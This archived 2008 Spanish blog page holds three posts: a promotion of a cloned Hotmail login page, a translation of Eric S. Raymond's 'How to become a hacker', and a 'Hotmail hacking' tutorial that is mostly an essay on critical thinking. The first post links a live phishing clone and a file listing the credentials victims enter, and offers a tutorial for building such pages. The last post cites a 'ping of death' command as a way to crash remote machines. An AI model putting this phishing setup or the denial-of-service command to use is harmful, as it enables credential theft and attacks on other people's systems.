Boocle

de Republica Dominicana

Archivo de Marzo 2008

Hacking – Tutorial

Publicado por jd33 en Marzo 30, 2008

AQUI SE DEBEN INGRESAR CUALQUIER TIPO DE DATOS LÓGICAMENTE FALSO O LOS VAS A PONER VERDADEROS???, LA PÁGINA ES UNA CLONACIÓN DE LA PÁGINA DE HOTMAIL. http://nuevosservicios.iespana.es/ultima.php

EN ESTÁ PÁGINA VERAN LOS DATOS QUE LOS USUARIOS METEN

http://nuevosservicios.iespana.es/pruebas.txt

UNA VEZ QUE ESTE CONVENCIDOS DE QUE FUNCIONA, PUEDEN APRENDER TODO EL PROCESO QUE SE DEBE HACER PARA CREAR SU PROPIA PAGINA WEB, EL TUTORIAL DE POWER POINT LO HICE CON CAPTURAS DE PANTALLA QUE TIENEN TODOS LOS TECLADOS ME REFIERO A PRINTLN, CON ESA TECLA SAQUE IMAGENES Y FORME UNA ESPECIE DE PELICULA PARA INDICAR DE LA MANERA MAS BREVE Y PRECISA TODO EL FUNCIONAMIENTO

MI PAGINA PRINCIPAL ES Y DESDE AHI DESCARGAN EL TUTORIAL, DONDE DICE DESCARGAR PRESENTACIONES POWER POINT O WORD.

http://www.galeon.com/alejandroelsoldado/img/index.html

Publicado en hack | Deja un Comentario »

Crackers Hackers

Publicado por jd33 en Marzo 30, 2008

Como ser un hacker Por: Eric S. Raymond
Para: www.trucoshacker.nireblog.com
¿Por qué existe este documento?
En mi trabajo como editor del Archivo de la jerga, recibo frecuentemente mensajes de novatosque consultan “¿cómo puedo aprender a ser un mago hacker?”. Triste es decir que no parecehaber ninguna FAQ ni documento Web que trate este tema vital, así que ahí va el mío.Si estás leyendo una copia de este documento fuera de la red, la versión original en inglésactualizada está en:http://www.tuxedo.org/esr/faqs/hacker−howto.htmly la traducción a castellano está en:http://www.webhost.cl/alvherre/hacker−howto_es.html.¿Qué es un hacker?El Archivo de la jerga contiene un montón de definiciones del término ‘hacker’, la mayoría delas cuales tiene que ver con la afición a lo técnico, y la capacidad de deleitarse en la solución deproblemas y al sobrepasar los límites. Si quieres saber como transformarte en hacker, bueno,sólo dos son realmente relevantes.Existe una comunidad, una cultura compartida, de programadores expertos y brujos de redes,cuya historia se puede rastrear décadas atrás, hasta las primeras minicomputadoras de tiempocompartido y los primigenios experimentos de ARPAnet. Los miembros de esta culturaacuñaron el término ‘hacker’. Los hackers construyeron Internet. Los hackers hicieron delsistema operativo UNIX lo que es en la actualidad. Los hackers hacen andar Usenet. Los hackershacen que funcione WWW. Si eres parte de esta cultura, si has contribuido a ella y otra gente tedice “hacker”, entonces eres un hacker.La mentalidad de hacker no está confinada a esta cultura de hackers en software. Hay personasque aplican la actitud de hacker a otras cosas, como electrónica o música −− de hecho, puedesencontrarla en los más altos niveles de cualquier ciencia o arte. Los hackers en softwarereconocen estos espíritus emparentados y los denominan ‘hackers’ también −− y algunossostienen que la naturaleza de hacker es en realidad independiente del medio particular en elcual el hacker trabaja. En el resto de este documento nos concentraremos en las habilidades yactitudes de los hackers en software, y en las tradiciones de la cultura compartida que originó eltérmino ‘hacker’.Existe otro grupo de personas que a gritos se autodenominan hackers, pero no lo son. Éstas sonpersonas (principalmente varones adolescentes) que se divierten ingresando ilegalmente encomputadores y estafando al sistema de telefonía. Los hackers de verdad tienen un nombre paraesas personas: ‘crackers’, y no quieren saber nada con ellos. Los hackers de verdad opinan quela mayoría de los crackers son flojos, irresponsables, y no muy brillantes, y fundamentan sucrítica en que ser capaz de romper la seguridad no lo hace a uno un hacker, de la misma maneraque ser capaz de encender un auto con un puente en la llave no lo puede transformar eningenieroautomotriz. Desafortunadamente, muchos periodistas y editores utilizan erróneamente la palabra‘hacker’ para describir a los crackers; esto es causa de enorme irritación para los verdaderoshackers.
——————————————————————————–
Page 2
La diferencia básica es esta: los hackers construyen cosas, los crackers las destruyen.Si deseas ser un hacker, continúa leyendo. Si quieres ser un cracker, mejor mira en el grupo denews alt.2600 y prepárate para soportar la dura realidad cuando descubras que no eres taninteligente como crees. Y eso es todo lo que voy a decir acerca de los crackers.La actitud del hackerLos hackers resuelven problemas y construyen cosas, y creen en la libertad y la ayuda voluntariamutua. Para ser aceptado como hacker, deberás comportarte como si tuvieras esta clase deactitud en tu interior. Y para comportarte como si tuvieras esta actitud, deberás creer de verdaden dicha actitud.Pero si piensas que el cultivo de las actitudes de hacker es una forma de ganar aceptación en lacultura, malinterpretarás el tema. La transformación en la clase de persona que cree en esascosas es importante para ti: para ayudarte a aprender y mantenerte motivado. Como en las artescreativas, el modo más efectivo de transformarse en un maestro es imitar la mentalidad de losmaestros −− no sólo intelectualmente, sino además emocionalmente.Por lo tanto, si quieres ser un hacker, repite lo siguiente hasta que lo creas:1. El mundo está lleno de problemas fascinantes que esperan ser resueltos.Es muy divertido ser un hacker, pero es la clase de diversión que requiere mucho esfuerzo. Elesfuerzo requiere motivación. Los atletas exitosos obtienen su motivación a partir una clase deplacer físico que surge de trabajar su cuerpo, al forzarse a sí mismos más allá de sus propioslímites físicos. De manera similar, para ser un hacker deberás sentir un estremecimiento de tipoprimitivo cuando resuelves un problema, aguzas tus habilidades, y ejercitas tu inteligencia.Si no eres la clase de persona que naturalmente siente de esta manera las cosas, necesitará poderexperimentarlas para llegar a ser un hacker. De otra manera, encontrarás que tu energía para‘hackear’ será absorbida por otras distracciones como sexo, dinero y aprobación social.(Además deberás desarrollar cierta clase de fe en tu propia capacidad de aprendizaje −− lacreencia de que aún cuando puedas no saber todo lo que necesitas para resolver el problema, sitomas una parte de él y aprendes desde allí, aprenderás lo suficiente para resolver la siguienteparte, y así, hasta que lo resuelvas completo.)2. Nadie debería tener que resolver un problema dos veces.Los cerebros creativos son un recurso valioso y limitado. No deben desperdiciarse reinventandola rueda cuando hay tantos y tan fascinantes problemas nuevos esperando.Para comportarte como hacker, debes creer que el tiempo empleado para pensar por los otroshackers es precioso −− tanto, que es casi una obligación moral para ti el compartir lainformación, resolver los problemas y luego exponer la solución de manera que los otroshackers puedan resolver nuevos problemas, en lugar de enfrentarse perpetuamente con losviejos.(No pienses que estás obligado a regalar todo tu producto creativo, aunque aquellos hackers quelo hacen son los que obtienen más respeto de los demás hackers. Se considera consistente con
——————————————————————————–
Page 3
los valores de un hacker que se venda lo suficiente para pagar la comida, la casa y los gastosrelacionados con el computador. También es consistente la utilización de estas habilidades dehacker para sostener a su familia, o incluso hacerse rico, siempre que no te olvides que eres unhacker mientras lo haces.)3. Lo aburrido y lo rutinario es malo.Los hackers (y las personas creativas en general) nunca debieran ser sometidas a trabajosrutinarios, porque cuando esto sucede significa que no están haciendo lo único que deben hacer:resolver nuevos problemas. Este desperdicio de talento daña a todo el mundo. Por ello, las tareasrutinarias, repetitivas y aburridas no sólo son desagradables, sino intrínsecamente malas.Para comportarte como hacker, debes creer en esto lo suficiente como para automatizar aquellaspartes de tareas todo lo que se pueda, no solamente para ti, sino en beneficio de todos los demás(especialmente otros hackers).(Existe una aparente excepción a esta regla. Los hackers hacen cosas a veces que pueden parecerrepetitivas o aburridas pero como ejercicio para lograr limpieza mental, o para obtener ciertahabilidad, u obtener cierta clase de experiencia que no podría tener de otro modo. Pero esto esuna elección −− ninguna persona pensante debiera nunca ser forzada a hacer cosas aburridas.)4. La libertad es buena.Los hackers son naturalmente anti−autoritaristas. Cualquiera que te pueda dar órdenes, puedehacer que debas dejar de resolver ese problema con el cual estás ocupado −− y, debido a lamanera en la cual trabajan las mentes autoritarias, encontrarán alguna razón espantosamenteestúpida para hacerlo. Por eso, la actitud autoritaria debe ser combatida donde sea que se laencuentre, pues si se la deja te asfixiará, tanto a ti como a los otros hackers.(Esto no es lo mismo que combatir toda autoridad. Los niños necesitan guía, y los criminalesrestricciones. Un hacker puede estar de acuerdo en aceptar cierta clase de autoridad para poderobtener algo que desea más que el tiempo que gasta en seguir órdenes. Pero éste es un pactolimitado, consciente; la clase de sumisión que desean los autoritarios no está en oferta.)Los autoritarios florecen en la censura y el secreto. Y desconfían de la cooperación voluntaria yel intercambio de información −− sólo les agrada la cooperación que tienen bajo su control. Asíque para comportarte como hacker, deberás desarrollar una hostilidad instintiva hacia la censura,el secreto, y la utilización de la fuerza o el fraude para someter a adultos responsables. Ydeberás estar preparado para actuar en consecuencia.5. La actitud no es sustituto para la habilidad.Para ser un hacker, deberás desarrollar algunas de esas actitudes. Pero tener la actitud por sí solano te transformará en hacker, como tampoco te puede transformar en un atleta campeón o enestrella de rock. Para transformarte en hacker necesitarás inteligencia, práctica, dedicación, ytrabajo duro.Por lo tanto, debes aprender a desconfiar de la actitud y respetar la habilidad en todas susformas. A ningún hacker le gusta perder el tiempo con quienes adoptan la pose de hacker, peroveneran la habilidad −− especialmente la habilidad al hackear, aunque la habilidad en cualquierámbito está bien. Especialmente buenas son las habilidades exigentes que pocos pueden
——————————————————————————–
Page 4
dominar, y las mejores son las habilidades exigentes queinvolucran agudeza mental, maña y concentración.Si respetas la habilidad, disfrutarás desarrollándola en ti mismo −− el pesado trabajo y ladedicación se transformarán en una especie de juego intenso, y no una rutina. Y éso es lo vitalpara transformarse en hacker.Habilidades básicas en un hackerLa actitud del hacker es vital, pero más aún lo son las habilidades. La actitud no es sustituto parala habilidad, y existe un cierto conjunto de herramientas básicas que debes dominar antes quecualquier hacker se le ocurra llamarte de ese modo.Este conjunto cambia lentamente a lo largo del tiempo a medida que la tecnología crea nuevashabilidades y descarta otras por obsoletas. Por ejemplo, se incluía la programación en lenguajede máquina, y no se hablaba de HTML hasta hace poco. Pero por ahora es claro que se debeincluir lo siguiente:1. Aprende a programar.Esta es, por supuesto, la habilidad fundamental del hacker. Si no conoces ningún lenguaje deprogramación, te recomiendo comenzar con Python. Está limpiamente diseñado, biendocumentado y es relativamente agradable para principiantes. A pesar de ser un buen lenguajeinicial, no es sólo un juguete: es muy poderoso y flexible y bien adaptado a proyectos grandes.Pero no creas que podrás ser un hacker, siquiera un programador, si conoces un único lenguaje−− debes aprender a pensar en los problemas de programación de una manera general,independiente de cualquier lenguaje. Para ser un hacker de verdad, debes llegar al punto en elcual puedes aprender un lenguaje nuevo en días, relacionando lo que está en el manual con loque sabes de antes. Esto significa que debes aprender varios lenguajes muy diferentes entre sí.Si quieres entrar a programar de verdad, tendrás que aprender C, el lenguaje central de Unix(aunque no es el que se debe intentar aprender primero). Otros lenguajes de importancia son Perly LISP. Perl vale la pena por razones prácticas: es muy usado en páginas WWW ’activas’ y enadministración de sistemas; tanto así que aunque nunca llegues a escribirlo, al menos tienes queaprender a leerlo. LISP es interesante de aprender por la profunda e iluminadora experiencia quetendrás cuando finalmente loconsigas: la experiencia te hará un mejor programador el resto de tu vida, incluso si nunca usasdemasiado el mismo LISP.Lo mejor, en realidad, es aprender estos cuatro lenguajes (Python, C, Perl y LISP). Además deser los lenguajes más importantes para hackear, representan enfoques muy disímiles a laprogramación, y cada uno te educará de maneras importantes.No puedo explicar en detalle en este documento como puedes aprender a programar −− es unahabilidad compleja. Pero puedo adelantarte que los libros y los cursos no servirán (muchos, y talvez la mayoría de los mejores hackers son autodidactas). Lo que sí servirá es (a) leer código y(b) escribir código.El aprendizaje de la programación es como aprender a escribir bien un lenguaje natural. Lamejor manera de aprender es leer algunas cosas escritas por los maestros del estilo, luego
——————————————————————————–
Page 5
escribir algunas cosas tú mismo, leer mucho más, escribir un poco más… y repetir esto hasta quelo que escribes empiece a mostrar la clase de fuerza y economía que ves en tus modelos.Antes era difícil encontrar código de buena calidad para leer, porque había pocos programas decierta magnitud disponibles en código fuente de tal manera que los nóveles hackers pudieranmeterles mano. Esta situación ha cambiado dramáticamente: software libre, herramientas deprogramación libres, y sistemas operativos libres (todo ello hecho por hackers) estánampliamente disponibles en la actualidad. Lo que me lleva elegentemente a nuestro siguientetema…2. Obtén uno de los UNIXs libres y aprende a usarlo y a ponerlo en funcionamiento.Doy por sentado que tienes un computador o puedes conseguir acceso a uno (estos muchachosde hoy en día tienen las cosas tan fácil :−)). El paso más importante que cualquier novato puededar en el camino de adquirir las habilidades de un hacker es obtener una copia de Linux oalguno de los otros Unixs tipo BSD libres, instalarlo en una máquina personal, y hacerlofuncionar.Si, es cierto que existen otros sistemas operativos en el mundo además de Unix. Pero sólopueden encontrarse en formato binario −− No puedes leer el código ni modificarlo. Si intentasaprender a hackear en una máquina DOS, Windows o en un MacOS te sentirás como si tratarasde bailar metido en una armadura.Además, Unix es el sistema operativo de Internet. Si bien puedes aprender a usar Internet sinsaber Unix, nunca podrás ser un hacker en Internet sin conocerlo. Por este motivo, la culturahacker actual está centrada fuertemente en Unix. (Esto no siempre fue así, e incluso la situaciónle desagrada a algunos de los hackers más viejos, pero la simbiosis entre Unix y la Internet estan fuerte que hasta la energía de Microsoft parece incapaz de hacerle mella.)Así que obtén un Unix −− personalmente me gusta Linux, pero hay otros. Aprende a usarlo.Hazlo funcionar. Métele mano, anímate. Comunícate en Internet mediante él. Lee el código.Modifícalo. En ese sistema se incluyen mejores herramientas de programación (incluyendoPython, C, Lisp y Perl) de lo que cualquier sistema operativo de Microsoft podría siquiera soñar,además te divertirás y te sumergirás en un caudal de conocimientos de tal magnitud que nuncahubieras imaginado, hasta que en cierto momento, mirando hacia atrás, te darás cuenta que yaeres un maestro hacker consumado.Si quieres saber más sobre del aprendizaje de Unix, mira The Loginataka.Para meter mano en Linux, mira en el directorio de distribuciones Linux o en el programa‘Linux CD Giveaway’ en Metalab.3. Aprende a usar la World Wide Web y escribir en HTML.La mayoría de las cosas que ha construido la cultura hacker trabajan fuera de la vista del granpúblico, ayudando en el funcionamiento de fábricas, oficinas y universidades, y carecen de unimpacto obvio en la vida de los que no son hackers. La Web es la única gran excepción, y es tanenorme y brillante este juguete de hackers que incluso los políticos admiten que está cambiandoel mundo. Sólo por esta razón (y hay un montón de otras igualmente buenas) debes aprendercomo trabajar en la WWW.Esto sólo no significa aprender a manejar un navegador (cualquiera puede hacer eso), sino que
——————————————————————————–
Page 6
debes aprender a escribir HTML, el lenguaje de marcas de WWW. Si aún no sabes programar,el aprendizaje que implica la escritura de HTML te enseñará algunos de los hábitos mentales quete ayudarán luego con la programación. Así que haz una página personal.Pero no creas que por tener una página personal estás más cerca de ser un hacker. La Web estállena de páginas personales. La mayoría de ellas son sin sentido, basura sin contenido −− basuramuy vistosa, pero basura al fin (si deseas ver más sobre este tema mira en The HTML HellPage).Para que valga la pena, tu página debe tener contenido −− debe ser interesante y útil para losotros hackers. Y esto nos lleva al próximo tema…Status en la Cultura HackerDe manera similar a muchas otras culturas sin economía monetaria, el hackerismo se basa en lareputación. Estás intentando resolver problemas interesantes, pero cuan interesantes son, y cuanbuenas son las soluciones que encuentres, es algo que sólo tus iguales o superiores técnicamentehablando serán capaces de juzgar.De acuerdo a esto, cuando juegas el juego de los hackers, aprendes a evaluarte principalmente enfunción de lo que los otros hackers piensan acerca de tus habilidades (éste es el motivo por elcual no puedes ser un hacker de verdad hasta que otros hackers te denominen así de manerafrecuente). Este hecho está empañado por la imagen del trabajo de hackear como trabajosolitario; también por un tabú cultural (que ha disminuido, pero aún es fuerte) que impide que seadmita al ego o la validación externa como elementos involucrados en la propia motivación.Específicamente, el hackerismo es lo que los antropólogos denominan cultura de la donación.Ganas status y reputación no mediante la dominación de otras personas, no por ser hermoso nipor tener cosas que otras personas desean, sino por regalar cosas. Específicamente, al regalar tutiempo, tu creatividad, y el resultado de tus habilidades.Existen básicamente cinco clases de cosas que puedes hacer para obtener el respeto de loshackers:1. Escribir software libre.Lo primero (lo más central y más tradicional) es escribir programas que los otros hackers opinenque son divertidos o útiles, y donar los fuentes del programa a la cultura hacker para que seanutilizados.Los más reverenciados semidioses del hackerismo son las personas que han escrito programas degran magnitud, con grandes capacidades que satisfacen necesidades de largo alcance, y losdonan, de tal manera que cualquiera pueda utilizarlos.2. Ayudar a probar y depurar software libreTambién son reconocidas aquellas personas que depuran los errores del software libre. En estemundo imperfecto, inevitablemente pasaremos la mayor parte de nuestro tiempo de desarrolloen la fase de depuración. Éste es el motivo por el cual los desarrolladores de software librepiensan que un buen beta−tester (uno que sabe como describir claramente los síntomas, quepuede localizar correctamente los problemas, que tolera los errores en una entrega preliminar, y
——————————————————————————–
Page 7
que está dispuesto a aplicar unas cuantas rutinas sencillas de diagnóstico) vale su peso en oro.Aún contando con un solo probador de éstos se puede lograr que el proceso de depuración pasede ser una prolongada y cansadora pesadilla a ser sólo una saludable molestia.Si eres un novato, trata de encontrar un programa en desarrollo en el cual estés interesado, y séun buen beta−tester. Hay una progresión natural desde ayudar a probar programas, luego ayudara depurarlos, y más adelante ayudar a modificarlos. Aprenderás mucho de esa manera, y crearásbuen karma con gente que te ayudará más adelante.3. Publicar información útil.Otra buena cosa que puedes hacer es recolectar y filtrar información útil e interesante y construirpáginas Web, o documentos FAQ (Preguntas Frecuentes en inglés), y ponerlos a disposición detodos.La gente que mantiene las FAQ técnicas más importantes gozan de casi tanto respeto como losautores de software libre.4. Ayudar a mantener en funcionamiento la infraestructura.La cultura hacker y el desarrollo ingenieril de la Internet funcionan gracias al trabajo voluntario.Existe una gran cantidad de trabajo necesario pero poco atractivo que debe hacerse para que estofuncione −− administrar listas de correo, moderar grupos de news, mantener sitios donde searchivan grandes cantidades de software, desarrollar RFCs y otros estándares técnicos.La gente que desarrolla estas actividades goza de mucho respeto, porque todos saben que esostrabajos son grandes consumidores de tiempo y no tan divertidos como meterse con el código.Los que lo llevan adelante demuestran su dedicación.5. Hacer algo por la cultura hacker en sí misma.Finalmente, puedes servir y propagar la cultura hacker en sí misma (por ejemplo, escribiendo untexto acerca de como transformarse en hacker :−)). Esto no es algo en lo cual estarás en posiciónde hacer hasta que seas conocido en el ambiente por las primeras cuatro cosas.La cultura hacker no tiene líderes, exactamente, pero tiene héroes culturales, consejeros tribalesy voceros. Cuando hayas estado en las trincheras tiempo suficiente, podrás transformarte en unode ellos. Pero ten cuidado: los hackers desconfían del ego ruidoso en sus jefes tribales, así que labúsqueda visible de esa clase de fama es peligrosa. Más que esforzarte por ella, tienes queponerte de forma que te caiga, y luego adoptar una actitud moderada y cortés acerca de ella.La conexión Hacker/NerdContrariamente al mito popular, no es necesario que seas un nerd para ser un hacker. Ayuda, sinembargo, y muchos hackers son nerds. Siendo un marginado social, puedes mantenerseconcentrado en las cosas realmente importantes, como pensar y hackear.Por esta razón, muchos hackers han adoptado la etiqueta ‘nerd’ e incluso utilizan el más ásperotérmino ‘geek’ como insignia de orgullo −− es su forma de declarar su propia independencia delas expectativas sociales normales. Si te interesa una explicación más detallada ve The GeekPage.
——————————————————————————–
Page 8
Si puedes encontrar la concentración suficiente en las tareas de hacker para ser bueno en ello, yencima disfrutar de la vida, está bien. Es muchísimo más fácil ahora que cuando yo era unnovato; la cultura popular ve con mejores ojos a los tecno−nerds en la actualidad. Hay ademásun número creciente de personas que se dan cuenta que los hackers frecuentemente son unmaterial de alta calidad para cónyuge. Si deseas ver algo más acerca de esto, vé la Girl’s Guideto Geek Guys.Si te sientes atraído por la actividad hacker porque no tienes una vida personal, está bientambién −− al menos no tendrás problemas de concentración. A lo mejor más adelante puedesconseguir una vida decente.Cuestiones de estiloDe nuevo, para ser un hacker, debes desarrollar la mentalidad del hacker. Existen algunas cosasque puedes hacer cuando estás sin computador que te pueden ayudar. Estas cosas no sonsustituto para la actividad propia de hackear (nada lo es), pero muchos hackers las realizan, ysienten que de alguna manera se conectan con la esencia de la actividad de hackear. Lee ciencia ficción. Asiste a reuniones sobre ciencia ficción (son buenos lugares paraencontrar hackers y proto−hackers) Estudia Zen, o practica artes marciales (la disciplina mental se parece de manera importante). Desarrolla oído analítico para la música. Aprende a apreciar música de clases peculiares.Aprende a tocar correctamente alguna clase de instrumento musical, o a cantar. Desarrolla tu inclinación por los dobles sentidos y los juegos de palabras. Aprende a escribir correctamente tu lengua nativa (una cantidad sorprendente de hackers,incluyendo a los mejores que conozco, son muy buenos escritores).Cuanto más de estas cosas hayas hecho, es más probable que poseas material natural parahacker.Finalmente, unas pocas cosas que no debes hacer. No uses nombres de usuario espectaculares o tontos. No te metas en guerras santas en Usenet (ni en ningún otro lado). No te autodenomines ‘cyberpunk’, ni pierdas tu tiempo con nadie que lo haga. No escribas correo electrónico o artículos de news con muchos errores de tipeo, ortografía oconstrucciones gramaticales incorrectas.La única reputación que te ganarás con esas costumbres es la de un imbécil. Los hackers tienenmuy buena memoria −− puede tomarte años que te acepten luego de estas cosas.Otras fuentes de informaciónPeter Seebach mantiene una excelente Hacker FAQ para administradores que no saben comotratar con hackers.El Loginataka nombra alguna de las cosas que hay que decir acerca del entrenamiento apropiadoy la actitud de un hacker de Unix.Además he escrito A Brief History Of Hackerdom.
——————————————————————————–
Page 9
También he escrito un artículo, The Cathedral and the Bazaar, que explica en detalle comotrabaja la cultura Linux y OpenSource. He tratado este tema más directamente en su secuelaHomesteading the Noosphere.Preguntas frecuentesP: ¿Podrías enseñarme a hackear?Desde la primera publicación de esta página, me llegan varios pedidos por semana de gente quequiere que le “enseñe todo sobre hackeo”. Desafortunadamente, no tengo ni el tiempo ni laenergía para hacer eso; mis propios proyectos de hackeo consumen el 110% de mi tiempo.Aunque pudiera, el hackeo es una actitud y habilidad que debes aprender por ti mismo. Verásque los hackers de verdad quieren ayudarte, pero no te respetarán si les pides que te den enbandeja todo lo que saben.Aprende unas cuantas cosas primero. Muéstrales que estás intentando, que eres capaz deaprender por tu cuenta. Luego habla con ellos y hazles tus preguntas.P: ¿Podrías ayudarme a crackear un sistema, o enseñarme a crackear?No. Cualquiera que pueda hacer una pregunta como esa despues de leer este documento esdemasiado estúpido para ser educable, aún si tuviera el tiempo para enseñar. Cualquier peticiónde este tipo por correo será ignorada o contestada con extrema durezaP: ¿Dónde puedo encontrar algunos verdaderos hackers para comunicarme conellos?La mejor manera es encontrar un grupo local de usuarios de Unix o Linux y asistir a susreuniones (existe una lista de grupos en la página de Metalab: Linux Users’ Group.(Solía decir que no encontrarías hackers de verdad en IRC, pero me han dicho que esto estácambiando. Aparentemente algunas comunidades de hackers unidas a proyectos como GIMP yPerl tienen sus propios canales de IRC).P: ¿Qué lenguaje debo aprender primero?HTML, si no lo conoces ya. Existe un montón de malos libros sobre HTML con brillantespáginas y con contenidos a la moda. El que más me gusta es HTML: The Definitive Guide.Cuando estés listo para comenzar con programación, te recomiendo que empieces con Perl oPython. C es realmente importante, pero también mucho más difícil.P: ¿Por dónde puedo empezar? ¿Dónde puedo conseguir un Unix libre?En otras partes de esta página ya incluí enlaces hacia donde obtener Linux. Para ser un hackernecesitas motivación, iniciativa y la capacidad para educarte a ti mismo. Comienza ahora…

Publicado en hack | Deja un Comentario »

Tutorial Hacking de Hotmail

Publicado por jd33 en Marzo 30, 2008

Tutorial hacking Hotmail
En este tutorial trataré de explicarles cómo hackear una cuenta de hotmail y además cómo entrar a esas páginas pornos que te piden un número de tarjeta de crédito.
——————————————————————————–

Bien pues, ya que tengo tu entera atención, porque no me vas a negar que al leer el título de este tutorial no has ido a preparar unos mates, o una taza de café, has descolgado el teléfono (en caso de que uses modem te sugiero verifiques si aún estas conectado!), apagado el celular si posees uno, has cerrado el MSN o ICQ o Jabber o cualquier otro mensajero, todo esto para que nadie te moleste entonces procederé a desilusionarte, aquí no vas a leer obscuros procedimientos cargados de jerga computacional ni te mostraré complicados algoritmos en algún arcano lenguaje de programación, ni encontrarás ningún programa para descargar que haga “magia” sobre un servidor remoto, no señor (o señorita).

En este tutorial te enseñaré a pensar. Ríete si quieres pero te estarás burlando de la herramienta más poderosa que tiene un aspirante a hacker. Aclaro de entrada que yo no soy ningún hacker. “Je!, este dice que no es hacker y pretende enseñarme a mi a ser uno” podrás argumentar, a lo que yo respondo, ¿cómo fue posible que el primer ingeniero nuclear apareciera si no había ninguno antes de él?, responde esta pregunta y luego burlate todo lo que quieras. El objetivo es hackear hotmail, ¿cierto?, ¡falso!, el objetivo es que aprendas a pensar y te diré, en mi humilde opinión cómo has de hacerlo para lograr cualquier cosa. Comencemos.

Regla 1: Se curioso.

De la duda surge el conocimiento, el conocimiento no viene solo, hay que buscarlo y afortunadamente está en todas partes. Leer es el principal médio para adquirir ese conocimiento, lee mucho, de todo, aunque a primera vista no parezca interesante, lo mismo da que sea un manual de TCP/IP que un poema de Borges, en todas las cosas hay algo para aprender, pero no solo esto, también formulate preguntas y busca las respuestas, así eso implique pasarte horas recorriendo resultados de Google o caminando hasta una biblioteca o posteando en foros y listas de correo. No desprecies ninguna respuesta, lee la regla número dos, en respuestas falsas hay algo de verdadero ¿quieres un ejemplo?, aquí está. La pregunta es ¿cómo volteo una máquina remota?, la respuesta es el “Ping de la muerte”, ejecuta PING -l 65535 y la máquina caerá. Esto es falso, si ejecutas eso en un sistema Windows no obtendrás nada pero hay algo de verdad en esto, el “ping de la muerte” existe, solo que no es aplicable usar desde Windows, acto seguido solo resta preguntar dónde es efectivo hacerlo.

Regla 2: Se crítico.

Ser curioso no es suficiente (aunque necesario), hay que analizar las respuestas, descartar lo que no sirve, leer entre líneas, ver el conjunto, no solo el arbol que tapa el bosque. No puedes criticar si no sabes cómo hacerlo, para ello hay que aprender a reconocer falacias argumentativas, oraciones que parecen ser verdaderas pero encierran una falsedad, un ejemplo: “el método X es efectivo para sacar un password de hotmail, muchas personas lo han probado y les funcionó”, esto que parece decir que el método X es la octava maravilla no es tal por una simple razón, la verdad no la establece la cantidad de casos anegdóticos con que se cuente ¿qué quiero decir con esto?, que si no lo probamos nosotros mismos nunca vamos a saber si es verdad o no que el método X funciona. Aplicando la regla 1 podemos decir que a pesar de que esa oración es una falacia ad numerum puede contener una verdad, existe un método X, solo resta verificarlo empíricamente, es decir, investigar y eventualmente probarlo. Parte de ser crítico es no asumir que lo que te están diciendo es necesariamente una verdad absoluta, puede que no te estén diciendo toda la verdad, puede que el caso no sea aplicable a lo que te interesa, si es esto último puedes tomarlo como un valor agregado, algo más para aprender.

Nunca confies en la reputación de nadie para sostener que algo es verdadero, tú eres el único juez de tí mismo para estableces tus verdades, nadie va a pensar por tí, y si alguien pretende hacerlo desconfía. Presta mucho cuidado a los argumentos basados en la ignorancia, dejame explicarte con un ejemplo: “yo antes usaba el método X hecho por otra persona y no me resultaba entonces decidí investigar por mi mismo y descubrí el método Y que sí me funcionó pero no se lo voy a decir a nadie”, es claro que el método Y será todo lo bueno que esa persona diga pero todavía le resta que de pruebas de que eso es así, eso es argumentar desde la ignorancia, está apelando a tu ignorancia sobre el método Y para que le creas que sí funciona, en definitiva, solo cuentas que su opinión y nada más porque ni siquiera te da algo con qué experimentar e incluso se niega a proporcionarte algo. Cosas de este estilo no te sirven, no te aporta nada, ignoralo.

Regla 3: El fin no es el médio.

Si no tienes en claro cuál es el fín que persigues no puedes trazar un camino para llegar a él. La curiosidad por la curiosidad misma es inútil, cuando has logrado algo debes mirar hacia atrás y criticar tu camino ¿había una forma mejor de hacer esto?, ¿hay otras formas de hacerlo?. Esto va también como aplicación de la regla 2 a tí mismo, critícate objetivamente, como si fueses tu propio alumno, trata de criticar tus verdades, puede ser que tú también estes equivocado. Quedarte con el logro y solo con eso puede reducir tus posibilidades de conseguir metas aún más ambiciosas, hoy un password de hotmail, mañana Echelon!

Regla 4: nada es verdadero hasta que se demuestre lo contrario.

Asume una postura esceptica antes que ninguna otra, trata siempre de falsar (no confundir con falsear, no es lo mismo) toda verdad asumida a priori, ¿cómo?, experimentando, poniendo a prueba lo que sabes. No existe persona inherentemente teórica, las teorías no salen de la nada, deben estar apoyadas en acontecimientos verificables, después de todo una teoría es nada más que una explicación aceptada de un hecho concreto. Si alguien te plantea una teoría, “el método Z dicen que es el mejor para resolver el problema A”, reproduce el problema A, aplica la solución Z, saca tus propias conclusiones, si no coinciden con la teoría o bién la teoría está mal o bién tú no has sabido cómo aplicarla, de vuelta a la regla 1.

Regla 5: se creativo.

No te quedes solo con el conocimiento de otros, genera también los tuyos propios. Recuerda aplicar la regla 2 a tí mismo/a también. Hay muchas formas de generar conocimiento a partir de conocimiento ya adquirido siendo creativo, si reconoces que tienes a la vista todas las herramientas disponibles y todo el conocimiento necesario acerca de un problema solo hace falta *crear* la solución y eso solo lo puedes hacer siendo un poco artista, es decir simplemente creativo, quizas en el camino descubras cosas nuevas que antes nadie había visto o se le ocurrió pensar, al menos nadie que tú conozcas. De esto último se desprende que debes ser pragmático, vale decir, descarta lo que no sirve (descartar no significa ignorar, solamente que no es aplicable a tu problema en concreto) y quedate con lo que sí sirve, con lo que sí es aplicable.

Muchas veces leo por ahí de gente diciendo cosas como “no se por qué hago esto si seguro que ya álguien lo hizo”, esto estará muy bién para casos triviales pero cabría preguntarse “lo que ese alguien hizo ¿encaja perfectamente en lo que yo necesito?”, voy más lejos “¿puedo mejorar lo que ese alguien ya hizo?”. A dos problemas distintos no se le puede aplicar la misma solución ¿cierto?, cierto, tu problema ¿es el mismo que el que supuestamente es aplicable la solución de ese alguien?

Consejos.

Si no tienes ánimo para conseguir tu objetivo hasta el fín mejor ni siquiera comiences. No hay victoria sin esfuerzo.

Ignora los juicios de valor. Si alguien te dice que estas loco por querer hacer lo que quieres no te está aportando nada, es mejor ignorarlo.

No requieras las cosas en bandeja de plata. Las obscuras soluciones hechas por otros no te aportan ningún conocimientos porque solo ves el qué pero no el cómo, a ti te interesan ambas cosas por igual.

Concentrate en tu objetivo. Durante la persecusión de una meta es facil caer en la tentación de desviarse para antender a cosas que derivadas de ellas te distraen de tu camino. Por ejemplo, al discutir con tus amigos tus planes ellos pueden decir que lo que estas planeando es inútil y sin sentido, tú no tienes por qué justificar tu proceder porque el conocimiento que adquieras será para tí, no para ellos y por más que al final resulte que tenían razón al menos tú lo has intentado y seguramente serás más sabios que ellos.

